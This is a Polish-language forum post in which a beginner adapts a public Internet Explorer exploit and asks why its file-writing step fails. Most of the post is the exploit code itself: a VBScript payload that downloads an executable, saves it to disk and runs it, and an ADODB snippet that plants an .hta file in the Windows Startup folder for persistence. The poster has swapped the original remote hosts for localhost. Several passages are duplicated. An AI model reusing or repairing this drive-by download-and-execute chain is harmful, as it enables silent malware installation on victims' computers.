Próbuje to na własny pożytek przerobić i czegoś chyba nie rozumiem bo zapisywanie pliku nie działa
ale po kolei
w pliku sp2rc.htm poprawiam http://freehost07.websamba.com/greyhats/writehta.txt na http://localhost/writehta.txt
plik foobar.txt zmieniam miejscami podobnie czyli adresik lokalny i inna nazwa pliku do sciagniecia czyli
natomiast najprowdopdopbniej plik writehtm.txt stanowi dla mnie problem
odpowiednią scieżkę do autostarta zrobiłem wedlug polskich windowsów...plik Microsoft Office.hta tworzy się ale po odpaleniu go nie sciąga nic...zajamuje on okolo 285kb a ten ze stronki http://greyhatsecurity.org/sp2rc.htm gdzies ponad 700kb wiec tutaj jest juz problem że pewnie plik foobar.txt jest nie uwzględniony...przerobiłem go ostatecznie tak:
jak widać linie "Dbq=http://www.malware.com;" zastapiłem localhostem...efekt taki że mi wogóle nie tworzy pliku hta i wywal IE bład skryptu w wierszu 4
I jak to ugryźć ? bo ja raczej taki początkujacy z tym...mam nadzieje że jakąś wskazóweczke mi podrzucicie
Dla niewtajemniczonych o samej istocie tego link ->http://greyhatsecurity.org/sp2rc-analysis.htm
ale po kolei
w pliku sp2rc.htm poprawiam http://freehost07.websamba.com/greyhats/writehta.txt na http://localhost/writehta.txt
plik foobar.txt zmieniam miejscami podobnie czyli adresik lokalny i inna nazwa pliku do sciagniecia czyli
Kod:
"meaning less shit i had to put here"
"<script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""http://localhost/plik.exe"",False : crap="""
""" : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:plik.exe"",2 : crap="""
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""
""" : ws.Run ""C:plik.exe"", 3, FALSE : crap="""
"""</script> crap="""natomiast najprowdopdopbniej plik writehtm.txt stanowi dla mnie problem
odpowiednią scieżkę do autostarta zrobiłem wedlug polskich windowsów...plik Microsoft Office.hta tworzy się ale po odpaleniu go nie sciąga nic...zajamuje on okolo 285kb a ten ze stronki http://greyhatsecurity.org/sp2rc.htm gdzies ponad 700kb wiec tutaj jest juz problem że pewnie plik foobar.txt jest nie uwzględniony...przerobiłem go ostatecznie tak:
Kod:
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://loclahost;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:Documents and SettingsAll UsersMenu StartProgramyAutostartMicrosoft Office.hta", adPersistXML
rs.close
conn.close
window.closejak widać linie "Dbq=http://www.malware.com;" zastapiłem localhostem...efekt taki że mi wogóle nie tworzy pliku hta i wywal IE bład skryptu w wierszu 4
I jak to ugryźć ? bo ja raczej taki początkujacy z tym...mam nadzieje że jakąś wskazóweczke mi podrzucicie
Dla niewtajemniczonych o samej istocie tego link ->http://greyhatsecurity.org/sp2rc-analysis.htm
